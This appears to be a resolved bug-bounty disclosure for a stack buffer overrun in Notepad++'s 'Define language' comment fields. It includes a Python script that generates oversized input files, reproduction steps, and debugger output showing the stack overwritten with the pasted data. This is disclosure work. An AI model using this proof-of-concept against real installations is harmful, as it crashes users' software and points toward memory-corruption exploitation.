Security check failure or stack buffer overrun (crash)
Low
N
Notepad++
Submitted None
Actions:
Reported by
bi7s
Vulnerability Details
Technical details and impact analysis
poc.py
#1) Run poc.py
#2) Open notepad++.exe
#3) Go to "Define language..."
#4) Use tab "Comment and Number"
#5) Open 1st_field.txt and copy content to clipboard
#6) Paste clipboard on "Comment line style in field Open"
#7) Open 2nd_field.txt and copy content to clipboard
#8) Paste clipboard on "Comment line style in field Close"
#9) notepad++ is crash
#!/usr/bin/python
buffer1 = "A" * 20000
buffer2 = "B" * 11000
try:
f=open("1st_filed.txt","w")
print "[+] Creating %s bytes for 1st field." %len(buffer1)
f.write(buffer1)
f.close()
print "[+] File created!"
except:
print "File for 1st field cannot be created."
try:
f=open("2nd_filed.txt","w")
print "[+] Creating %s bytes for 2nd field." %len(buffer2)
f.write(buffer2)
f.close()
print "[+] File for 2nd filed created!"
except:
print "File for 2nd field cannot be created."
Debugger information:
ccc.600): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
*** ERROR: Module load completed but symbols could not be loaded for npp.exe
npp+0x139d34:
00007ff6`8ee39d34 cd29 int 29h
0:000> r
rax=0000000000000001 rbx=0042004200420042 rcx=0000000000000002
rdx=0000009ec8b25b0e rsi=00007ff68ef96b90 rdi=0042004200420042
rip=00007ff68ee39d34 rsp=0000009ec8b07820 rbp=0000009ec8b25969
r8=000001265173ef68 r9=0000009ec8b078a0 r10=0000000000000000
r11=0000000000000246 r12=0000000000180b4a r13=0000000000180b4a
r14=0000000000000111 r15=0000000000000001
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
npp+0x139d34:
00007ff6`8ee39d34 cd29 int 29h
0:000> k
Child-SP RetAddr Call Site
0000009e`c8b07820 00007ff6`8ee211fa npp+0x139d34
0000009e`c8b07860 00420042`00420042 npp+0x1211fa
0000009e`c8b258e0 00420042`00420042 0x00420042`00420042
0000009e`c8b258e8 00420042`00420042 0x00420042`00420042
0000009e`c8b258f0 00420042`00420042 0x00420042`00420042
0000009e`c8b258f8 00420042`00420042 0x00420042`00420042
0000009e`c8b25900 00420042`00420042 0x00420042`00420042
0000009e`c8b25908 00420042`00420042 0x00420042`00420042
0000009e`c8b25910 00420042`00420042 0x00420042`00420042
0000009e`c8b25918 00420042`00420042 0x00420042`00420042
0000009e`c8b25920 00420042`00420042 0x00420042`00420042
0000009e`c8b25928 00420042`00420042 0x00420042`00420042
0000009e`c8b25930 00420042`00420042 0x00420042`00420042
0000009e`c8b25938 00420042`00420042 0x00420042`00420042
0000009e`c8b25940 00420042`00420042 0x00420042`00420042
0000009e`c8b25948 00420042`00420042 0x00420042`00420042
0000009e`c8b25950 00420042`00420042 0x00420042`00420042
0000009e`c8b25958 00420042`00420042 0x00420042`00420042
0000009e`c8b25960 00420042`00420042 0x00420042`00420042
0000009e`c8b25968 00420042`00420042 0x00420042`00420042
0000009e`c8b25970 00420042`00420042 0x00420042`00420042
0000009e`c8b25978 00420042`00420042 0x00420042`00420042
0000009e`c8b25980 00420042`00420042 0x00420042`00420042
0000009e`c8b25988 00420042`00420042 0x00420042`00420042
0000009e`c8b25990 00420042`00420042 0x00420042`00420042
0000009e`c8b25998 00420042`00420042 0x00420042`00420042
0000009e`c8b259a0 00420042`00420042 0x00420042`00420042
0000009e`c8b259a8 00420042`00420042 0x00420042`00420042
0000009e`c8b259b0 00420042`00420042 0x00420042`00420042
0000009e`c8b259b8 00420042`00420042 0x00420042`00420042
0000009e`c8b259c0 00420042`00420042 0x00420042`00420042
0000009e`c8b259c8 00420042`00420042 0x00420042`00420042
0000009e`c8b259d0 00420042`00420042 0x00420042`00420042
0000009e`c8b259d8 00420042`00420042 0x00420042`00420042
0000009e`c8b259e0 00420042`00420042 0x00420042`00420042
0000009e`c8b259e8 00420042`00420042 0x00420042`00420042
0000009e`c8b259f0 00420042`00420042 0x00420042`00420042
0000009e`c8b259f8 00420042`00420042 0x00420042`00420042
0000009e`c8b25a00 00420042`00420042 0x00420042`00420042
0000009e`c8b25a08 00420042`00420042 0x00420042`00420042
0000009e`c8b25a10 00420042`00420042 0x00420042`00420042
0000009e`c8b25a18 00420042`00420042 0x00420042`00420042
0000009e`c8b25a20 00420042`00420042 0x00420042`00420042
0000009e`c8b25a28 00420042`00420042 0x00420042`00420042
0000009e`c8b25a30 00420042`00420042 0x00420042`00420042
0000009e`c8b25a38 00420042`00420042 0x00420042`00420042
0000009e`c8b25a40 00420042`00420042 0x00420042`00420042
0000009e`c8b25a48 00420042`00420042 0x00420042`00420042
0000009e`c8b25a50 00420042`00420042 0x00420042`00420042
0000009e`c8b25a58 00420042`00420042 0x00420042`00420042
0000009e`c8b25a60 00420042`00420042 0x00420042`00420042
0000009e`c8b25a68 00420042`00420042 0x00420042`00420042
0000009e`c8b25a70 00420042`00420042 0x00420042`00420042
0000009e`c8b25a78 00420042`00420042 0x00420042`00420042
0000009e`c8b25a80 00420042`00420042 0x00420042`00420042
0000009e`c8b25a88 00420042`00420042 0x00420042`00420042
0000009e`c8b25a90 00420042`00420042 0x00420042`00420042
0000009e`c8b25a98 00420042`00420042 0x00420042`00420042
0000009e`c8b25aa0 00420042`00420042 0x00420042`00420042
0000009e`c8b25aa8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ab0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ab8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ac0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ac8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ad0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ad8 00420042`00420042 0x00420042`00420042
0000009e`c8b25ae0 00420042`00420042 0x00420042`00420042
0000009e`c8b25ae8 00420042`00420042 0x00420042`00420042
0000009e`c8b25af0 00420042`00420042 0x00420042`00420042
0000009e`c8b25af8 00420042`00420042 0x00420042`00420042
0000009e`c8b25b00 00200033`00300020 0x00420042`00420042
0000009e`c8b25b08 00000000`00340030 0x00200033`00300020
0000009e`c8b25b10 00000000`00000001 0x340030
0000009e`c8b25b18 0000009e`c8b25b20 0x1
0000009e`c8b25b20 00000000`00000000 0x0000009e`c8b25b20
0:000> q
## Impact
At least it's a denial of service.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Buffer Over-read